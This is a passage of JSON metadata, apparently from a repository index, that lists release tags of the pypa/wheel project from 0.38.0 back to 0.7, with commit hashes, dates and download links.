_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d